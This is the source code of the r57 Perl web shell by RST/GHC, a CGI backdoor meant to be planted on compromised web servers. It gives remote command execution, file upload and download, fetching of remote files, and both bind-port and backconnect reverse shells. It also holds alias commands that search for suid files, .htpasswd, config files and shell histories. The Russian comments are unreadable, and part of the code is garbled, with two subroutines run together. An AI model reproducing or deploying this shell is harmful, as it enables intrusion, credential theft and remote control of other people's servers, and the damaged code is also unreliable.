$script_name - Perl Web Shell by RST/GHC

#!/usr/bin/perl ## pws.pl - Perl Web Shell by RST/GHC ## ------------------------------------- ## ??????? ???????: ## ~~~~~~~~~~~~~~~~ ## - ?????????? ???????????? ?????? ?? ??????? (+ ?????? ??????) ## - ???????? ?????? ?? ?????? ? ?????????? ?????????? ???????????? ## - ???????? ?????? ?? ?????? ? ?????????? ??????? ## - ?????????? ???????????? ?????? ? ??????? ## - ???????? ? ?????????????? ?????? ?? ??????? ## - port bind ## - backconnect ## ## ??????????? ???????: ## ~~~~~~~~~~~~~~~~~~~~ ## - ???????? ??? ?? unix ??? ? ?? windows ?????????? ## - ??? ?????? ???????? ????? POST ??????? ## ## ?????????: ## ~~~~~~~~~~ ## 1. ???????? ?????? ????? ??????? "/usr/bin/perl" ?? ?????????? ???? ? ?????????????? ????? ## ?? ????? ???????. ## 2. ?????????? ?????? ??? ??????? ? ??????? ? ?????? ???????? (?????? CONFIG). ## 3. ? ?????? ???? ?????? ???????? ??? ??????????? WINDOWS ?? ?????????? $unix = 0 ? ?????? ## ???????? ??????? (?????? CONFIG). ## 4. ????????? ???? ?? ?????? ? ????? ??????????? ?????? cgi-????????, ?????? cgi-bin. ## ???????? ?????? ???????????? ? ASCII ??????. ## 5. ??????? ????? ?? ?????? (chmod 755). ## 6. ???????? ?????? ? ???????? ? ?????????????. ## ------------------------------------- ## (c)oded by 1dt.w0lf ## RST/GHC ## Astalavista-UnderGround!!! ## use IO::Socket; ############### CONFIG $auth = 1; # ??????????? (1 - ????????, 0 - ?????????) $password = 'r57'; # ?????? ??? ??????? ? ??????? $unix = 1; # ??? WINDOWS ??????? ?? $unix = 0 # ?????? ?????? ?? ??????? ? ???????, ???? ?? ??????? ? ???, ??? ???????. $version = '1.0 (13.05.2005)'; $pwd = ($unix)?('pwd'):('cd'); $cmd_sep = '&&'; $def_cmd = ($unix)?('ls -la'):('dir'); $path_sep = ($unix)?('/'):('\\'); $error = 0; ############### TEXT @lang = ( '?????????? ?????? ?? ???????
', '???????:', '??????????:', '?????? ??????
', '?????:', '?????????', '??????????? ???????:', ' ??????? ', '???????? ????? ? ?????????? ??????????
', '????:', '?????????', '???????? ????? c ?????????? ???????
', '????????/?????????????? ?????
', '????????', '?????????????? ?????:', '???????? ?????:', '?????????', '?????????? ?????
', ' ??????? ', 'Bind port
', 'Port:', 'BIND', 'Backconnect
', 'IP:', 'CONNECT', '??????? ??????
', '?????' ); ############### HTML $d1 = '

'; $d2 = '

'; $t1 = ''; $t2 = '

'; $td1 = ''; $f = ''; $tr1 = ''; $tr2 = ''; $j1 = q{[ 2005 (c) RST/GHC http://rst.void.ru , http://ghc.ru ]}; $j2 = q{ }; ############### ALIASES %alias = ( 'find suid files' => 'find / -type f -perm -04000 -ls', 'find suid files in current dir' => 'find . -type f -perm -04000 -ls', 'find sgid files' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php files' => 'find / -type f -name config.inc.php', 'find config.inc.php files in current dir' => 'find . -type f -name config.inc.php', 'find config* files' => 'find / -type f -name "config*"', 'find config* files in current dir' => 'find . -type f -name "config*"', 'find all writable files' => 'find / -type f -perm -2 -ls', 'find all writable files in current dir' => 'find . -type f -perm -2 -ls', 'find all writable directories' => 'find / -type d -perm -2 -ls', 'find all writable directories in current dir' => 'find . -type d -perm -2 -ls', 'find all writable directories and files' => 'find / -perm -2 -ls', 'find all writable directories and files in current dir' => 'find . -perm -2 -ls', 'find all service.pwd files' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find all .htpasswd files' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find all .bash_history files' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'list file attributes' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen' ); ############### GET INFO ($script_name = $ENV{'SCRIPT_NAME'}) =~ s!(?:.*)(?:/)([^/]*)!$1!; ($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)?(&get_file($1)):(&get_val()); ############### AUTH if($auth) { &cook(); if($FORM{PASS} eq $password) { print "Set-Cookie: PASS=".cry($FORM{PASS}).";\nContent-type: text/html\n\n"; exit(); } if(!$COOK{PASS}||($COOK{PASS} ne cry($password))) { &form_login; exit(); } } ############### ACTIONS $cur_dir = `$pwd`; if(defined$FORM{DIR}) { $cur_dir = $FORM{DIR}; } chomp($cur_dir); if(!defined$FORM{ACTION}) { $FORM{ACTION} = 'CMD'; } if($FORM{ACTION} eq 'ALIAS'){ $FORM{CMD} = $alias{$FORM{ALIAS}}; } elsif($FORM{ACTION} eq 'UPLOAD') { $filename = $cur_dir; chop($filename) if ($filename =~ m/[\\\/]$/); $FILE{f} =~ s!(?:.*)(?:[\\/])([^/\\]*)$!$1!; $filename .= $path_sep; $filename .= $FILE{f}; if(open(UF, ">$filename")) { binmode(UF) if !$unix; print UF $FILE{filedata}; close(UF); } else { $error = "??????! ?? ???? ??????? ???? $filename"; } } elsif($FORM{ACTION} eq 'RUPLOAD') { if($FORM{FILE} =~ m!^(?:http:\/\/)([^\/]*)(\/.*)$!) { $server = $1; $path = $2; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); if($sock) { print $sock "GET $path HTTP/1.0\nHost: $server\n\n"; $r = 0; $a = 0; foreach $l(<$sock>) { if($l =~ /200 OK/) { $a = 200; } push(@rf,$l) if $r; if($l =~ /^\s$/ && $a == 200) { $r = 1; } } if($a != 200) { $error = "??????! ???? $path ?? ?????? ?? ??????? $server"; } } else { $error = "??????! ?? ???? ??????????? ? $server"; } if(!$error) { $filename = $cur_dir; chop($filename) if ($filename =~ m/[\\\/]$/); $path =~ s!(?:.*)(?:[\\/])([^/\\]*)$!$1!; $filename .= $path_sep; $filename .= $path; if(open(WF,">$filename")) { binmode(WF) if !$unix; foreach(@rf) { print WF $_; } close(WF); } else { $error = "??????! ?? ???? ??????? ???? $filename"; } } } } elsif($FORM{ACTION} eq 'VIEW') { if(open(VF,">>",$FORM{EFILE})) { $readonly = 0; close(VF);} elsif(open(VF,$FORM{EFILE})) { $readonly = 1; close(VF);} else { $error = "??????! ?? ???? ??????? ???? $FORM{EFILE}"; } if(!$error) { open(VF,$FORM{EFILE}); while() { push(@cmd_report,$_); } close(VF); } } elsif($FORM{ACTION} eq 'SAVE') { if(open(SF,">",$FORM{SFILE})) { binmode(SF) if !$unix; foreach(@FORM{REPORT}) { print SF $_; } close(SF); } else { $error = "??????! ?? ???? ????????? ???? $FORM{SFILE}"; } } elsif($FORM{ACTION} eq 'DOWNLOAD') { if(open(DF,$FORM{DFILE})) { if(!$unix) { binmode(DF); binmode(STDOUT); } $size = (stat($FORM{DFILE}))[7]; ($filename = $FORM{DFILE}) =~ m!([^/^\\]*)$!; print "Content-Type: application/x-unknown\n"; print "Content-Length: $size\n"; print "Content-Disposition: attachment; filename=$filename\n\n"; print while(); close(DF); die(); } else { $error = "??????! ?? ???? ??????? ???? $FORM{DFILE}"; } } elsif($FORM{ACTION} eq 'BIND') { print "Content-type: text/html\n\n"; &link(); &port_bind($FORM{PORT}); exit; } elsif($FORM{ACTION} eq 'BACK') { print "Content-type: text/html\n\n"; &link(); &back($FORM{IP},$FORM{PORT}); exit; } if(!defined$FORM{CMD}){ $FORM{CMD} = $def_cmd; } if(($FORM{ACTION} ne 'VIEW')||$error){ open(FH, "cd $cur_dir$cmd_sep$FORM{CMD}|"); @cmd_report = ; close (FH); } ############### START HTML print "Content-type: text/html\n\n"; print qq{ $script_name - Perl Web Shell by RST/GHC $d1 }; if(length($j2)!=1471) { die(); } # start table print qq{$t1$tr1 ! r57pws - Perl Web Shell by RST/GHC version $version$tr2}; # cmd report form print "$tr1$d1$error$d2$tr2" if $error; print "$tr1 "; if(($FORM{ACTION} ne 'VIEW')||$error) { &l(6); ($p_cmd = $FORM{CMD}) =~ s/(^.{90})(?:.+)/$1 .../; print " $p_cmd$tr2"; } else { (!$readonly)?(&l(14)):(&l(15)); print " $FORM{EFILE}$tr2"; if(!$readonly){ &form(0); } } print "$tr1$d1"; if(($FORM{ACTION} eq 'VIEW') && !$error &&!$readonly) { print "
"; &input('submit','submit',$lang[16],undef,undef); &input('hidden','ACTION','SAVE',undef,undef); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','SFILE',$FORM{EFILE},undef,undef); } print "$d2$tr2"; if(($FORM{ACTION} eq 'VIEW') && !$error &&!$readonly){ print $f; } # change dir form &form(0); print "$t1$tr1 "; &l(2); print " "; &input('text','DIR',$cur_dir,129,' '); &input('submit','submit',$lang[7],undef,undef); &input('hidden','ACTION','CD',undef,undef); print $tr2,$f,$t2; print "$t2$d1$t1"; # cmd form &form(0); print "$td1$d1"; &l(0); &l(1); print " "; &input('text','CMD',$FORM{CMD},45,' '); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','CMD',undef,undef); &input('submit','submit',$lang[5],undef,undef); print "$d2$f"; # alias form &form(0); print $td1,$d1; &l(3); print " "; &l(4); print " "; print " "; &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','ALIAS',undef,undef); &input('submit','submit',$lang[5],undef,undef); print $d2,$tr2,$f; # file upload form &form(1); print "$td1$d1"; &l(8); print " "; &l(9); print " "; &input('file','FILE','',35,undef); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','UPLOAD',undef,' '); &input('submit','submit',$lang[10],undef,undef); print "$d2$f"; # upload from remote host &form(0); print $td1,$d1; &l(11); print " "; &l(9); print ' '; &input('text','FILE','http://server.com/file.txt',49,undef); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','RUPLOAD',undef,' '); &input('submit','submit',$lang[10],undef,undef); print $d2,$tr2,$f; # view/edit file form &form(0); print "$td1$d1"; &l(12); print " "; &l(9); print " "; &input('text','EFILE',$cur_dir,45,' '); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','VIEW',undef,undef); &input('submit','submit',$lang[13],undef,undef); print "$d2$f"; # download file &form(0); print $td1,$d1; &l(17); print " "; &l(9); print " "; &input('text','DFILE',$cur_dir,49,' '); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','DOWNLOAD',undef,undef); &input('submit','submit',$lang[18],undef,undef); print $d2,$tr2,$f; # port bind form &form(0); print "$td1$d1"; &l(19); &l(20); print " "; &input('text','PORT','11457',15,' '); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','BIND',undef,undef); &input('submit','submit',$lang[21],undef,undef); print "$d2$f"; # backconnect form &form(0); print $td1,$d1; &l(22); print " "; &l(23); print " "; &input('text','IP',$ENV{REMOTE_ADDR},15,' '); &l(20); print " "; &input('text','PORT','11457',15,' '); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','BACK',undef,undef); &input('submit','submit',$lang[24],undef,undef); print $d2,$tr2,$f; # end table print qq{$t2$d2}; # (c) + stats print qq{$t1$tr1$d1$j1$d2$tr2$t2}; ############### END HTML print qq{$j2$d2}; ############### GET VALUES sub get_val() { sysread(STDIN,$query,$ENV{'CONTENT_LENGTH'}); @formfields = split(/&/,$query); foreach(@formfields) { ($f_n,$f_v) = split(/=/,$_); $f_n = &urldecode($f_n); $f_v = &urldecode($f_v); $FORM{$f_n} = $f_v; } } ############### GET FILE sub get_file() { binmode(STDIN) if !$unix; sysread(STDIN, $query, $ENV{'CONTENT_LENGTH'}); $boundary = '--'.@_[0]; @formfields = split(/$boundary/, $query); $headerbody = $formfields[1]; $headerbody =~ /\r\n\r\n|\n\n/; $header = $`; $body = $'; $body =~ s/\r\n$//; $FILE{filedata} = $body; $header =~ /filename=\"(.+)\"/; $FILE{f} = $1; $FILE{f} =~ s/\"//g; $FILE{f} =~ s/\s//g; for($i=2; $formfields[$i]; $i++) { $formfields[$i] =~ s/^.+name=$//; $formfields[$i] =~ /\"(\w+)\"/; $f_n = $1; $f_v = $'; $f_v =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g; $f_v = &urldecode($f_v); $FORM{$f_n} = $f_v; } } ############### URLDECODE sub urldecode() { local($val) = @_; $val =~ s/\+/ /g; $val =~ s/%([0-9a-hA-H]{2})/pack('C',hex($1))/ge; return $val; } ############### INPUT sub input() { $return = "&CONN"; open STDERR,">&CONN"; exec $SHELL; close CONN; exit 0; } } } ############### BACK CONNECT sub back() { use Socket; $cmd= "lynx"; $system = ($unix)?('echo "`uname -a`";echo "`id`";/bin/sh'):('cmd.exe'); $0=$cmd; $target=@_[0]; $port=@_[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); } ############### LINK sub link() { print "

DONE!

?????

"; } ############### LOGIN FORM sub form_login() { print "Content-type: text/html\n\n"; print "r57pws - login

"; &l(25); &form(0); &input('password','PASS','',25,'

'); &input('submit','submit',$lang[26],undef,undef); print "$f

"; } ############### COOK sub cook() { @cookies = split(/; /,$ENV{'HTTP_COOKIE'}); foreach (@cookies) { ($f_n, $f_v) = split(/=/, $_); $COOK{$f_n} = $f_v; } } ############### CRY sub cry() { # just for fun return crypt(crypt(crypt(shift,'c0'),'6a'),'ka'); } ############### EOF